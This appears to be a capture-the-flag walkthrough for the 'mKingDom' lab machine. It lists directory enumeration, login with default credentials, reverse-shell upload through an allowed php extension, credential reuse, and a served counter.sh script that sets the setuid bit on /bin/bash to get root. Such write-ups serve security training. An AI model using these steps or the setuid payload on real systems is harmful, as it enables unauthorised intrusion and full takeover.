mKingDom

Enumeration

• Port 85 (HTTP)
• Scan with the gobuster dir -u http://10.10.203.92:85 -w ~/HackTools/directory-list-2.3-medium.txt

        
            Found /app -> redirecting to castle
        
    

• Login form at http://10.10.203.92:85/app/castle/index.php/login

Exploit

• Try Login using admin:password

• Go To System Settings

• Add Extention php

• Try Upload revshell and setup listener for revshell

• Click the link for file and fot the revshell

PRIVESC

• Check Configuration file to get some password

• Use the credential toad:toadisthebest to get privesc
• Upload the linpeas.sh and look at the environment

$ echo $PWD_token | base64 -d 

• Upload pspy64 to check the running process

• Then setup the python3 -m http.server 85 to serve app/catle/application/counter.sh

        
            #!/bin/bash
            chmod +s /bin/bash
        
    

• After wait for a few second we use /bin/bash -p to gain access as root

• Got The password

        user.txt `thm{REDACTED}`
        root.txt `thm{REDACTED}`